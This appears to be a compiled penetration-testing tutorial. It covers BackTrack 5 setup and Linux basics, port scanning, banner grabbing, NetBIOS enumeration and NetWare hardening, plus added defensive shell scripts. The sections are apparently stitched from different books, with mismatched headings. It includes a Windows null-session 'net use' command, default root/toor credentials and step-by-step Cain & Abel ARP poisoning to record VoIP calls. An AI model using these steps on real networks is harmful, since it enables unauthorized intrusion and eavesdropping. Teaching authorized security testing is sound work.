So now that you are familiar with Linux, let me introduce you to BackTrack. BackTrack is a Linux penetration testing distro developed by Offensive Security especially for ethical hackers and penetration testers. It contains all the popular tools and software used for pen testing a variety of services, networks, and devices. BackTrack 5 is the latest version of the Linux penetration testing distro at the time of writing this. It comes in two flavors: Gnome and KDE. Gnome is an Ubuntu-based Linux operating system that has officially been introduced only in the latest version of BackTrack. Here is a screenshot of BackTrack 5.

Figure: BackTrack 5 running.

How to Get BackTrack
Now that you have a basic idea of what BackTrack is and why it is used, it’s time to install BackTrack on our box and get things going. There are many ways you can get BackTrack up and running. I install BackTrack on virtualization software such as VMware or VirtualBox. Personally, I am a fan of VirtualBox, since it does not take much of my computer’s memory. Therefore, what we will learn next is how to install BackTrack on VirtualBox.

Installing BackTrack on VirtualBox
There are times when we need to switch between operating systems rapidly and we need our BackTrack running alongside another OS like Windows or Red Hat Linux. One advantage of doing this is it gives us more accessibility. For doing this you need to download VM VirtualBox, which is a freely available tool.

Step 1—After downloading and installing VirtualBox on your PC, click on the “New” button. A dialogue box will appear where you need to type the name of the “OS,” the “Version,” and the operating system type. In my case the name would be “BackTrack,” the OS “Linux,” and the version “Ubuntu.”

Step 2—The next step would be to allocate the RAM; it is recommended that you allocate at least 1024 MB (1 GB) for BackTrack to run perfectly.

Step 3—Next, choose to create a virtual drive and then in the next window select the hard drive type as VDI (Virtual Disk Image).

Step 4—In the next step, you have to choose if you want the hard disk to be dynamically allocated or have a fixed size. If you have enough space on your hard disk, you might want to choose the first option. Nevertheless, it’s up to you.

Step 5—Next, choose the name of your virtual hard drive and allocate the size of the hard disk.


Step 6—So, now when the virtual hard disk has been created and other settings are selected, load the BackTrack that was downloaded onto the virtual box and click “Start”.

That’s all we need to do. We now have BackTrack installed on our VirtualBox.

Installing BackTrack on a Portable USB
BackTrack can also be made portable by installing it on to a USB flash drive. This way you can carry BackTrack Live anywhere. This practice is useful for outsourced penetration tests and, moreover, it is very easy to make a BackTrack USB.

For this you need the following:
◾USB flash drive (minimum 8 GB)
◾A disk burning software
For this purpose, we are going to use PowerISO, which is freely available online at http://www.poweriso.com

Step 1—Format your flash drive and ensure that it has at least 7 GB of free space.

Step 2—Open PowerISO from the “Start” menu.

Step 3—Click on “Tools” and from the dropdown list select “Make a bootable USB.”

Step 4—The following dialogue box will appear.


Step 5—Locate your BackTrack ISO disk image.

Step 6—Now it will start burning the image on to your USB drive.


Step 7—When the process is complete, the following message appears.

Installing BackTrack on Your Hard Drive
If you run BackTrack from VMware or VirtualBox, any changes you make are lost after rebooting; to solve this issue, we need to install BackTrack on the hard drive. For this, we need two things:
1. BackTrack Live CD or BackTrack installed on VMware or VirtualBox.
2. A hard drive with a minimum of 20 GB free space.

Step 1—Insert the disk into the drive and boot from it. This is what you will see in the beginning:


Step 2—Then you will see the screen root@bt:, where you will have to type the command “startx”.

Step 3—Now that we have booted into BackTrack, we will install it on our hard drive. Click on the icon “Install BackTrack” and your installation should start.

Step 4—On the Welcome screen, you will have to select the appropriate language and click “Forward”.

Step 5—Now select your time zone. Or, if you are already connected to the network, your time zone will automatically be detected.

Step 6—Now a window to select the desired keyboard layout appears.


Step 7—Next we will have to set the partition size. In most cases we leave it at the default and the entire partition is erased.

Step 8—Now the install summary appears and you just have to click on “Install” and your work is done. The installer will take some time to complete, which may be several minutes.

After the installation is complete, you will be prompted to restart your PC and as you reset your BackTrack, it will be installed to your hard drive.

BackTrack Basics
Once you have BackTrack up and running, it’s time to learn about BackTrack basics. By the time you are reading this book, BackTrack would have been upgraded to version 6 or 7, and you might be wondering if the techniques discussed work only for BackTrack 5. If so, then you are wrong. Starting from BackTrack 1 all the way to BackTrack 5, the only thing that changed were the tools. Outdated tools are removed and new tools are added, but the structure and fundamentals stay the same. One of the common problems I see with beginners is that they tend to use the KDE menu a lot. I suggest you stay away from the KDE menu and try to use the command line before jumping to the KDE menu. I want you to familiarize yourself with BackTrack’s environment as it will be discussed in many of the upcoming chapters, especially in the later chapters of this book. Taking you back to BackTrack, the /pentest directory is by far the most important directory present in BackTrack as it has all the penetration testing tools. To access the pentest directory of BackTrack, open up your shell and type “cd /pentest” and then type “ls”. “ls” will list all the subdirectories present in the pentest directory.

Changing the Default Screen Resolution
The default size of the BackTrack 5 screen is 800 by 600, which is very small and is not recommended. If you want to change your BackTrack 5 (KDE) default screen size, then just follow these steps:
Step 1—Go to Start → Settings → System Settings
Step 2—Then from the hardware section click on “Display and Monitor”
Step 3—Next choose your preferred size and click “Ok”. A dialog box will now appear asking you to confirm the changes. Just click “Accept Configuration” and you are done.

Some Unforgettable Basics

Changing the Password
We need to issue the following command in order to change the password of our Linux box. Generally, it’s a good practice to change the default password to prevent unscrupulous people from getting into the network. This is the reason I have kept this command at the top of the basics list.
passwd

Clearing the Screen
In the Windows command prompt we use “cls”; inside Linux BackTrack we use the clear command.

Listing the Contents of a Directory
ls
ls is used for listing the contents of a directory; the -l parameter can also be used for listing the permissions of the current directory.

Displaying Contents of a Specific Directory
ls /pentest/enumeration
It is used to list the contents of a specific directory. Issuing this command generates a list of the contents of the /pentest/enumeration directory.

Displaying the Contents of a File
cat password.txt
This command lists the contents of the password.txt file.

Creating a Directory
mkdir directoryname
The process is the same as in Windows.

Changing the Directories
cd /pentest/enumeration
Changing directories is very simple. It works as in Windows. However, we use / in Linux instead of \ for changing directories.
Windows: C:\windows\settings
Linux: /pentest/web/scanners

Creating a Text File
touch hack.txt
This command creates a text file with the name hack.txt.

Copying a File
cp source target
cp /var/www/filename /pentest/web/filename
This command will copy the file from the /var/www directory to the /pentest/web/ directory.

Current Working Directory
pwd
This will return the current working directory.

Renaming a File
mv oldfile.txt newfile.txt
There is no command specifically for renaming files inside Linux; however, you just need to issue the mv command to rename the file.

Moving a File
mv hack.txt /pentest/enumeration/
This command will move the file hack.txt to the /pentest/enumeration directory.

Removing a File
rm filename
This is very simple, and it works for directories in the same way.

Locating Certain Files inside BackTrack
Let’s say we are searching for the “TheHarvester” tool and we don’t know in which directory it exists. We can use the locate command to find it.
Example
locate harvester
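As an added example (not code from the book), the following POSIX shell script exercises the commands from the command list earlier in this chapter and from the basics above in a scratch directory created under /tmp, and checks the outcome of each step. The security-relevant check is the last one: a file holding a secret, like the password.txt above, should end up readable by its owner only, which is what chmod 600 does and what ls -l shows as -rw-------. All paths are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the book: run the basic commands in a scratch
# directory and check their effects. All paths here are constructed.

# Build a small workspace with mkdir, touch, cp, mv and chmod; print its path.
make_workspace() {
    ws=$(mktemp -d)                      # unique scratch directory under /tmp
    mkdir "$ws/enumeration"              # mkdir: create a directory
    touch "$ws/hack.txt"                 # touch: create an empty file
    printf 'secret\n' > "$ws/password.txt"
    cp "$ws/hack.txt" "$ws/enumeration/" # cp: copy into another directory
    mv "$ws/hack.txt" "$ws/notes.txt"    # mv: rename (Linux has no rename command)
    chmod 600 "$ws/password.txt"         # owner read/write only; no group/other access
    echo "$ws"
}

# Print a file's permission bits in octal (GNU stat first, BSD stat as fallback).
perm_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Succeed only if nobody but the owner can read the file (ls -l shows -rw-------).
owner_only() {
    [ "$(perm_of "$1")" = "600" ]
}

# Count the entries ls would list in a directory.
count_entries() {
    ls -1 "$1" | wc -l | tr -d ' '
}

# Remove the workspace with rm -r and confirm it is gone.
cleanup_workspace() {
    rm -r "$1" && [ ! -d "$1" ]
}

# Stand-alone run: build, inspect, clean up.
ws=$(make_workspace)
ls -l "$ws"          # shows the 600 mode on password.txt
owner_only "$ws/password.txt" && echo "password.txt is owner-only"
cleanup_workspace "$ws"
```

The functions are written so each step can be verified rather than assumed: after make_workspace runs, hack.txt must be gone from the top level, its copy must exist under enumeration/, and perm_of must report 600 for the secret file.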

Text Editors inside BackTrack
BackTrack by default does not have any fancy text editors like Notepad in Windows. It has some text editors that we can use within the command line such as nano, pico, and vim. However, if you want to use a text editor that is equivalent to Notepad in Windows, I would recommend you use kate or gedit. In order to install them, you would need to issue the following commands from the command line:
apt-get install gedit
apt-get install kate
These commands will automatically search the Internet and download the packages and dependencies.

Getting to Know Your Network
The first thing that we need to check when we are on BackTrack is whether we have a valid IP address. If you type the command “ifconfig” in your command line, it will list all of your current configurations.

As you can see from the screenshot, the local IP is 192.168.75.130 and the subnet mask is 255.255.255.0; you can also see other configurations including network interfaces.

dhclient
By running the command dhclient followed by the interface name in the terminal, a new IP address will automatically be assigned by DHCP. However, if for any reason this method does not work for you, you can start networking by issuing the following command:
root@bt:~# /etc/init.d/networking start

Services
BackTrack has a variety of useful services such as Apache and MySQL that are disabled by default. You can enable these services by issuing various commands on your console.
Note: Before starting any services such as SSH, you should consider changing your root password, which is “toor” by default, to prevent hackers and other unscrupulous people from getting into your network.

MySQL
By default the MySQL service runs in your BackTrack 5 OS. You can easily start or stop the service by issuing the following init.d script:
Start—/etc/init.d/mysql start
Stop—/etc/init.d/mysql stop

SSHD
SSH functions the same way as the FTP protocol. However, it is used for secure file sharing as the data being sent and received is encrypted. So it’s considered more secure than FTP. However, weaknesses have also been identified in SSHD clients, though it’s relatively more secure than FTP. In order to start an SSH server, first you need to generate SSH keys. You can generate SSH keys by simply issuing the following command in your console.

Let’s now connect to your SSH server from your Windows operating system. In order to do that you would need an SSH client such as PuTTY.
Step 1—Run the following command in order to start the SSH server on your BackTrack.
/etc/init.d/ssh start
You can verify if SSH is running by typing the following command:
netstat -ano | grep 22

Next, type “ifconfig” from your terminal to obtain your IP address.
Step 2—Open up PuTTY on your Windows operating system. Type your BackTrack IP address and connect to port 22.
Step 3—Now it will ask you for your credentials. Enter “root” as username and “toor” as password in case you haven’t changed the default credentials.
Step 4—Once you have entered the credentials, you will be inside the BackTrack console; now you can run BackTrack from your Windows.
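A more precise version of the netstat check in Step 1, added here as an example rather than taken from the book: grep 22 also matches port 2222, an established connection from a client port such as 50322, or any address containing "22", so this POSIX shell script parses netstat -ant style lines field by field and only reports a TCP socket that is in the LISTEN state on the exact port. It also reads the effective PermitRootLogin value from an sshd_config, which is what decides whether the default root/toor credentials mentioned in Step 3 can be used over SSH at all. The netstat lines and the configuration are constructed sample data, not captured from BackTrack.

```shell
#!/bin/sh
# Added example, not from the book. Sample data below is constructed.

# Constructed netstat -ant style output with a program column.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1300/mysqld
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      1400/other
tcp        0      0 192.168.75.130:22       192.168.75.1:50322      ESTABLISHED 1234/sshd'

# Constructed sshd_config: a commented-out "no" followed by an active "yes".
SAMPLE_SSHD_CONFIG='Port 22
#PermitRootLogin no
PermitRootLogin yes
PasswordAuthentication yes'

# listening_on PORT: read netstat lines on stdin; succeed if a TCP socket
# is in LISTEN state on exactly PORT. The port is the last colon-separated
# field of the local address, which also works for IPv6 addresses.
listening_on() {
    awk -v p="$1" '
        $1 ~ /^tcp/ && $6 == "LISTEN" { n = split($4, a, ":"); if (a[n] == p) found = 1 }
        END { exit found ? 0 : 1 }'
}

# listen_ports: print every distinct listening TCP port, ascending, space separated.
listen_ports() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' |
        sort -n -u | tr '\n' ' ' | sed 's/ $//'
}

# permit_root_login: print the effective PermitRootLogin value from an
# sshd_config on stdin. sshd uses the first occurrence of a keyword and
# ignores comment lines, so a commented "no" above an active "yes" is "yes".
# Keywords are matched case-sensitively here for brevity.
permit_root_login() {
    awk '$1 == "PermitRootLogin" { print $2; found = 1; exit }
         END { if (!found) print "unset" }'
}

# Stand-alone run against the constructed data.
printf '%s\n' "$SAMPLE_NETSTAT" | listening_on 22 && echo "sshd is listening on 22"
echo "listening ports: $(printf '%s\n' "$SAMPLE_NETSTAT" | listen_ports)"
echo "PermitRootLogin: $(printf '%s\n' "$SAMPLE_SSHD_CONFIG" | permit_root_login)"
```

To use it on a live system, replace the constructed data with real output, for example netstat -ant | listening_on 22 and permit_root_login < /etc/ssh/sshd_config. A result of "yes" together with an unchanged default password is the combination the note at the top of this section warns about.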

PostgreSQL
By default, the BackTrack 5 box does not come with postgresql. However, Metasploit does support postgresql databases. In order to install postgresql, we need to issue the following command in the console.
apt-get install postgresql
Once postgresql is successfully installed on your BackTrack 5 box, all you need to do is issue the following service init script in order to start the postgresql service.
/etc/init.d/postgresql start
However, if you are still facing problems in getting postgresql up and running, don’t worry. We shall get to it once we reach the “Remote exploitation” chapter of this book. BackTrack 5 also offers a wide variety of other services, such as tftpd and apache, which you can also run from the command line and which are also present in the KDE menu. The services are present in the BackTrack → Services tab in the main menu.

Other Online Resources
◾http://Linux.org
◾http://beginLinux.org
◾http://Linux-tutorial.info
◾BackTrack-Linux.org

SuperScan
My favorite tool for performing generic TCP port scans is SuperScan version 3.0. Don’t laugh because it’s so old! It’s reliable, which goes a long way in my book. Figure 8-2 shows the results of my scan and a few interesting ports open on several hosts, including Windows Terminal Server and SSH.

Only Scan Responsive Pings and All Selected Ports in List options. However, you might want to select some other options:
✓ If you don’t want to ping each host first, deselect the Only Scan Responsive Pings option. ICMP can be blocked, which can cause the scanner not to find certain hosts, so this option can make the test run more efficiently.
✓ If you want to scan a certain range of well-known ports or ports specific to your systems, you can configure SuperScan to do so. I recommend these settings:
• If you want to perform a scan on well-known ports, at least select the All Selected Ports in List option.
• If this is your initial scan, scan all ports from 1 to 65,535.

NetScanTools Pro
NetScanTools Pro (www.netscantools.com) is a nice all-in-one commercial tool for gathering general network information, such as the number of unique IP addresses, NetBIOS names, and MAC addresses. It also has a neat feature that allows you to fingerprint the operating systems of various hosts. Figure 8-4 shows the OS fingerprint results while scanning a Linksys router/firewall.

Countermeasures against ping sweeping and port scanning
Enable only the traffic you need to access internal hosts — preferably as far as possible from the hosts you’re trying to protect — and deny everything else. This goes for standard ports, such as TCP 80 for HTTP and ICMP for ping requests. You apply these rules in two places:
✓ External router for inbound traffic
✓ Firewall for outbound traffic
Configure firewalls to look for potentially malicious behavior over time (such as the number of packets received in a certain period of time), and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute or 100 consecutive ping (ICMP) requests. Most firewalls and IDSes/IPSes can detect such scanning and cut it off in real time. You can break applications on your network when restricting network traffic, so make sure that you analyze what’s going on and understand how applications and protocols are working before you disable any type of network traffic.

Banner grabbing
Banners are the welcome screens that divulge software version numbers and other system information on network hosts. This banner information might identify the operating system, the version number, and the specific service packs to give the bad guys a leg up on attacking the network. You can grab banners by using either good old telnet or some of the tools I mention, such as Nmap and SuperScan.
telnet
You can telnet to hosts on the default telnet port (TCP port 23) to see whether you’re presented with a login prompt or any other information. Just enter the following line at the command prompt in Windows or UNIX:
telnet ip_address
You can telnet to other commonly used ports with these commands:
✓ SMTP: telnet ip_address 25
✓ HTTP: telnet ip_address 80
✓ POP3: telnet ip_address 110

System scanning
A few straightforward processes can identify weaknesses in Windows systems.
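The threshold rule under the countermeasures against ping sweeping and port scanning above (10 port scans in one minute, 100 consecutive ping requests) is the kind of logic a firewall or IDS applies to its own logs. As an added example that is not from the book, this POSIX shell script runs both checks over constructed firewall log lines: it flags a source address that touches at least N distinct TCP ports within a sliding window of W seconds, and a source that sends at least M ICMP echo requests. The log format (epoch time, source, destination, protocol, destination port) and every address in it are constructed for the example; a real firewall log needs its own field mapping.

```shell
#!/bin/sh
# Added example, not from the book. Log lines are constructed.
# Format: <epoch> <src> <dst> <proto> <dport>  (dport is "-" for ICMP)
SAMPLE_FW_LOG='1700000000 10.0.0.5 10.0.0.1 tcp 21
1700000001 10.0.0.5 10.0.0.1 tcp 22
1700000002 10.0.0.5 10.0.0.1 tcp 23
1700000003 10.0.0.5 10.0.0.1 tcp 25
1700000004 10.0.0.5 10.0.0.1 tcp 80
1700000005 10.0.0.5 10.0.0.1 tcp 445
1700000010 10.0.0.8 10.0.0.1 tcp 80
1700000011 10.0.0.8 10.0.0.1 tcp 80
1700000012 10.0.0.8 10.0.0.1 tcp 443
1700000000 10.0.0.9 10.0.0.1 tcp 21
1700000120 10.0.0.9 10.0.0.1 tcp 22
1700000240 10.0.0.9 10.0.0.1 tcp 23
1700000360 10.0.0.9 10.0.0.1 tcp 25
1700000480 10.0.0.9 10.0.0.1 tcp 80
1700000600 10.0.0.9 10.0.0.1 tcp 445
1700000020 10.0.0.7 10.0.0.1 icmp -
1700000021 10.0.0.7 10.0.0.1 icmp -
1700000022 10.0.0.7 10.0.0.1 icmp -
1700000023 10.0.0.7 10.0.0.1 icmp -
1700000030 10.0.0.8 10.0.0.1 icmp -'

# flag_port_scanners [THRESHOLD] [WINDOW]: read log lines on stdin and print
# each source that touched at least THRESHOLD distinct TCP ports within any
# WINDOW-second span. Defaults match the text: 10 ports in 60 seconds.
# Events for a given source must arrive in time order, as they do in a log.
flag_port_scanners() {
    awk -v thr="${1:-10}" -v win="${2:-60}" '
    $4 == "tcp" {
        src = $2; n[src]++
        ts[src, n[src]] = $1 + 0; port[src, n[src]] = $5
        split("", seen); cnt = 0
        # walk back over the events of this source that are still inside the window
        for (i = n[src]; i >= 1 && ts[src, i] >= $1 - win; i--)
            if (!(port[src, i] in seen)) { seen[port[src, i]] = 1; cnt++ }
        if (cnt >= thr && !(src in flagged)) { flagged[src] = 1; print src }
    }'
}

# flag_ping_sources [THRESHOLD]: print sources that sent at least THRESHOLD
# ICMP requests. Default matches the text: 100 requests.
flag_ping_sources() {
    awk -v thr="${1:-100}" '
    $4 == "icmp" { c[$2]++ }
    END { for (s in c) if (c[s] >= thr) print s }'
}

# Stand-alone run with lower thresholds so the small sample triggers.
echo "port scanners (5 ports / 60 s): $(printf '%s\n' "$SAMPLE_FW_LOG" | flag_port_scanners 5 60)"
echo "ping sources (4 requests): $(printf '%s\n' "$SAMPLE_FW_LOG" | flag_ping_sources 4)"
```

The sample is built to show why the window matters: 10.0.0.5 hits six ports in six seconds and is flagged, while 10.0.0.9 hits the same six ports two minutes apart and is not, because no 60-second span ever holds more than one of them. Widening the window to 1000 seconds flags both. 10.0.0.8 repeatedly fetches ports 80 and 443, which is what a normal client looks like, and is never flagged.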

Testing
Start gathering information about your Windows systems by running an initial port scan:
1. Run basic scans to find which ports are open on each Windows system:
• Scan for TCP ports with a port scanning tool, such as SuperScan. The SuperScan results in Figure 10-1 show several potentially vulnerable ports open on a Windows Server 2003 system, including those for a Web server (port 80), and the ever-popular — and easily hacked — NetBIOS (port 139).
2. Perform OS enumeration (such as scanning for shares and specific OS versions) by using an all-in-one assessment tool, such as LANguard. Figure 10-2 shows a LANguard scan that reveals the server version, vulnerabilities, open ports, and more.
If you need to quickly identify the specific version of Windows that’s running, you can use Nmap (http://nmap.org/download.html) with the -O option (using Nmap to determine the Windows version). Other OS fingerprinting tools are available, but I’ve found Nmap to be the most accurate.
3. Determine potential security vulnerabilities. This is subjective and might vary from system to system, but what you want to look for are interesting services and applications and proceed from there.

Countermeasures against system scanning
You can prevent an external attacker or malicious internal user from gathering certain information about your Windows systems by implementing the proper security settings on your network and on the Windows hosts. You have the following options:
✓ Use a network firewall.
✓ Use the Windows Firewall or other personal firewall software on each system. You want to block the Windows networking ports for RPC (port 135) and NetBIOS (ports 137–139 and 445).
✓ Disable unnecessary services so that they don’t appear when a connection is made.

NetBIOS
You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN. These Windows NetBIOS ports can be compromised if they aren’t properly secured:
✓ UDP ports for network browsing:
• Port 137 (NetBIOS name services)
• Port 138 (NetBIOS datagram services)
✓ TCP ports for Server Message Block (SMB):
• Port 139 (NetBIOS session services)
• Port 445 (runs SMB over TCP/IP without NetBIOS)

Hacks
The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS.

Unauthenticated enumeration
When you’re performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems two ways:

✓ All-in-one scanners, such as LANguard or QualysGuard
✓ The nbtstat program that’s built in to Windows (nbtstat stands for NetBIOS over TCP/IP Statistics)
Figure 10-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.

nbtstat shows the remote computer’s NetBIOS name table, which you gather by using the nbtstat -A command. This displays the following information:
✓ Computer name
✓ Domain name
✓ Computer’s MAC address
When running nbtstat against a Windows NT or Windows 2000 server, you might even glean the ID of the user who’s currently logged in. An advanced program such as LANguard isn’t necessary to gather this basic information from a Windows system. However, the graphical interface offered by commercial software such as this presents its findings in a prettier fashion and is often much easier to use. Additionally, you have the benefit of gathering the information you need with one tool.

Shares
Windows uses network shares to share certain folders or drives on the system so other users can access them across the network. Shares are easy to set up and work very well. However, they’re often misconfigured, allowing hackers and other unauthorized users to access information they shouldn’t be able to get to. You can search for Windows network shares by using the Share Finder tool built in to LANguard. This tool scans an entire range of IP addresses, looking for Windows shares.

The shares displayed in Figure 10-5 are just what malicious insiders are looking for because the share names give a hint of what type of files might be accessible if they connect to the shares. After the bad guys discover these shares, they’re likely to dig a little further to see whether they can browse the files within the shares. I cover shares and rooting out sensitive information on network shares and other storage devices in Chapter 15.

Countermeasures against NetBIOS attacks
You can implement the following security countermeasures to minimize NetBIOS and NetBIOS over TCP/IP attacks on your Windows systems:
✓ Use a network firewall.
✓ Use the Windows Firewall or other personal firewall software on each system.
✓ Disable NetBIOS — or at least Windows File and Printer Sharing. Disabling NetBIOS might not be practical in a network where users and applications depend on file sharing or in a mixed environment where older Windows 2000 and NT systems rely on NetBIOS for file and printer sharing.
✓ Educate your users on the dangers of enabling file shares for everyone to access. I cover these risks in detail in Chapter 15.
Hidden shares — those with a dollar sign ($) appended to the end of the share name — don’t really help hide the share name. Any of the tools I’ve mentioned can see right through this form of security by obscurity.

Mapping
To map a null session, follow these steps for each Windows computer to which you want to map a null session:
1. Format the basic net command, like this:
net use \\host_name_or_IP_address\ipc$ "" "/user:"
The net command to map null sessions requires these parameters:
• net (the built-in Windows network command) followed by the use command
• IP address or hostname of the system to which you want to map a null connection
• A blank password and username
The blanks are why it’s called a null connection.
2. Press Enter to make the connection. Figure shows an example of the complete command when mapping a null session. After you map the null session, you should see the message The command completed successfully.

To confirm that the sessions are mapped, enter this command at the command prompt:
net use
As shown in Figure 10-6, you should see the mappings to the IPC$ share on each computer to which you’re connected.

Linux Vulnerabilities
Vulnerabilities and attacks against Linux are creating business risks in a growing number of organizations — especially e-commerce companies, network product vendors, and ISPs that rely on Linux for many of their systems. When Linux systems are hacked, the victim organizations can experience the same side effects as their Windows-using counterparts, including:
✓ Leakage of sensitive information
✓ Cracked passwords
✓ Corrupted or deleted databases
✓ Systems taken completely offline

Choosing Tools
You can use many UNIX-based security tools to test your Linux systems. Some are much better than others. I often find that my Windows-based commercial tools do as good a job as any. My favorites are as follows:
✓ Windows-based SuperScan version 3 (www.foundstone.com/resources/proddesc/superscan3.htm) for ping sweeps and TCP port scanning

✓ Nmap (http://nmap.org) for OS fingerprinting and more detailed port scanning
✓ Windows-based LANguard (www.gfi.com/lannetscan) for port scanning, OS enumeration, and vulnerability testing
✓ THC-Amap (http://freeworld.thc.org/thc-amap) for application version mapping
✓ Tiger (ftp://ftp.debian.org/debian/pool/main/t/tiger) for automatically assessing local system security settings
✓ Linux Security Auditing Tool (LSAT) (http://usat.sourceforge.net) for automatically assessing local system security settings
✓ QualysGuard (www.qualys.com) for OS fingerprinting, port scanning, and very detailed and accurate vulnerability testing
✓ Nessus (www.nessus.org) for OS fingerprinting, port scanning, and vulnerability testing
✓ BackTrack (www.remote-exploit.org/backtrack.html) toolset on a bootable CD or .iso image file
Hundreds if not thousands of other Linux hacking and testing tools are available on such sites as SourceForge.net (http://sourceforge.net) and freshmeat.net (http://freshmeat.net). The key is to find a set of tools — preferably as few as possible — that can do the job that you need to do and that you feel comfortable working with.

Port scanning
Start testing your NetWare systems by performing an initial port scan to check what hackers can see. You can perform these scans in two ways:
✓ If the server has a public IP address, scan from outside the firewall, if possible.
✓ If the server doesn’t have a public IP address, you can scan internally on the network. The bad guys can be inside your network, too!
The SuperScan results in Figure show several potentially vulnerable ports open on this NetWare server, including FTP and the commonly exploited Echo and Character Generator ports. In addition, the NetWare-specific port 524 is NCP (NetWare Core Protocol). NetWare uses this protocol for its internal communications with hosts, such as clients and other servers — similar to SMB in Windows. You might also find that GroupWise is running (TCP/UDP port 1677), as well as a Web server and other Web-based remote-access ports, such as 80, 443, 2200, 8008, and 8009. You can also perform a scan with LANguard Network Security Scanner. Using a commercial tool such as this can often provide more details about the systems you scan than a basic port scanner can. Figure 12-2 shows that LANguard can determine more information about the server, such as the NetWare version and SNMP information. This is another good use for the SNMP enumeration tool Getif (www.wtcs.org/snmp4tpc/getif.htm), which I describe in Chapter 8. It also tells you what’s listening on the open ports without you having to look them up. Don’t overlook QualysGuard (www.qualys.com) as a good NetWare security testing tool. This tool tests for a handful of NetWare-specific vulnerabilities related to the NetWare Enterprise Web Server and other abend (a Novell term that stands for abnormal end) issues that most other tools simply don’t catch.

Minimizing NetWare Security Risks
Although you can’t completely defend NetWare servers against attacks, you can come pretty close, which is an improvement over other “leading” operating systems. These NetWare hacking countermeasures can help improve security on your NetWare server beyond what I’ve already recommended.

Rename admin
Rename the admin account. Figure shows how this can be done in the Novell ConsoleOne utility.

Be careful when renaming the admin account, though. Other applications, such as the server backup software, might depend on the admin ID. If you rename admin, be sure to edit any backup jobs or startup scripts that depend on the admin account name. It’s best to not use the admin account for backup and other administrative tasks anyway, so this might be a good time to make a change by creating an admin equivalent for each application that depends on an admin ID. Creating these equivalents can help make your system more secure by reducing the number of places that the admin account is exposed and vulnerable to cracking on the network.

Disable eDirectory browsing
Disabling Public’s right to browse the directory tree in either NetWare Administrator for NetWare 4.x or Novell ConsoleOne for NetWare 5.x and later is a good way to ward off attacks. This right is enabled by default to allow users to browse the eDirectory tree easily. Disabling the Public Browse right or any other eDirectory or file rights can cause problems, such as locking users (including you) out of the network, disabling login scripts, and disabling printing. The potential risk depends on how you configure eDirectory. If you remove Public’s Browse right, you can usually grant specific object rights lower in the tree, where they’re needed to keep everything working. Make sure that you test these types of critical changes before applying them to your production environment.

NetWare Administrator
Follow these steps to disable the Public Browse right to eDirectory with NetWare Administrator (sys:\public\win32\nwadmn32.exe):
1. Right-click the Root object in your directory tree.
2. Choose Trustees of This Object.
3. Select the [Public] trustee, as shown in Figure.
4. In the Object Right section, deselect the Browse check box.
5. Click OK.

Novell ConsoleOne
Follow these steps to disable the Public Browse right to eDirectory with Novell ConsoleOne (sys:\public\mgmt\ConsoleOne\1.2\bin\ConsoleOne.exe):
1. Right-click your tree object.
2. Choose Trustees of This Object.
3. Select the [Public] trustee and then click Assigned Rights.
4. In the Rights section, deselect the Browse check box, as shown in Figure.
5. Click OK twice.

Remove bindery contexts
Remove any bindery contexts loaded on your server. Bindery contexts are in place in NetWare 4.x and later to provide backward compatibility with older clients that need to access the servers as though they’re NetWare 3.x or earlier servers. This is typically present (and necessary) for older applications or NetWare clients (such as netx and VLMs) that make bindery calls instead of eDirectory calls. Removing bindery contexts can help prevent hacker attacks against bindery weaknesses. To disable the bindery context on your server, simply comment out the set Bindery Context line in your server’s autoexec.ncf file using a # sign. If you remove your bindery contexts, make sure that no clients or applications depend on NetWare bindery emulation.

Audit the system
Turn on system auditing by running auditcon at a command prompt. This program can help you track down a future intruder by auditing files, volumes, and even the directory tree. It’s just a good security practice, as well.

TCP/IP parameters
In NetWare 5.x and above, based on your specific version, you can prevent several types of DoS attacks by entering the following TCP/IP parameters at the server console:
set discard oversized ping packets=on
set discard oversized UDP packets=on
set filter subnet broadcast packets=on
set filter packets with IP header options=on
set ipx netbios replication option=0
set tcp defend land attacks=on
set tcp defend syn attacks=on
You can enter the preceding commands into the server’s autoexec.ncf file so that they load each time the server starts.

Patch
Patch, patch, and patch again! Novell lists the latest patches for the NetWare versions it supports on its Web site: http://download.novell.com

Capturing and recording voice traffic:
If you have access to the wired or wireless network, you can capture VoIP conversations easily. This is a great way to prove that the network and the VoIP installation are vulnerable. There are many legal issues associated with tapping into phone conversations, so make sure you have permission and are careful not to abuse your test results.

You can use Cain & Abel (technically just Cain for the features I demonstrate here) to tap into VoIP conversations. You can download Cain & Abel free at www.oxid.it/cain.html. Using Cain’s ARP poison routing feature, you can plug in to the network and have it capture VoIP traffic:

1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode. The Hosts page opens by default.
2. Click the Start/Stop APR icon (it looks like the nuclear waste symbol). The ARP poison routing process starts and enables the built-in sniffer.
3. Click the blue + icon to add hosts to perform ARP poisoning on.
4. In the MAC Address Scanner window that appears, ensure that All Hosts in My Subnet is selected and then click OK.
5. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page.
6. Click the white space under the uppermost Status column heading (just under the Sniffer tab). This re-enables the blue + icon.
7. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 3.
8. Select your default route or other host that you want to capture packets traveling to and from. I just select my default route, but you might consider selecting your SIP manager or other central VoIP system. The right column fills with all the remaining hosts.
9. In the right column, Ctrl+click the system you want to poison to capture its voice traffic. In my case, I select my VoIP network adapter, but you might consider selecting all your VoIP phones.
10. Click OK to start the ARP poisoning process. This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host’s local TCP/IP stack.
11. Click the VoIP tab and all voice conversations are “automagically” recorded. Here’s the interesting part — the conversations are saved in .wav audio file format, so you simply right-click the recorded conversation you want to test and choose Play, as shown in the figure. Note that conversations being recorded show Recording... in the Status column.

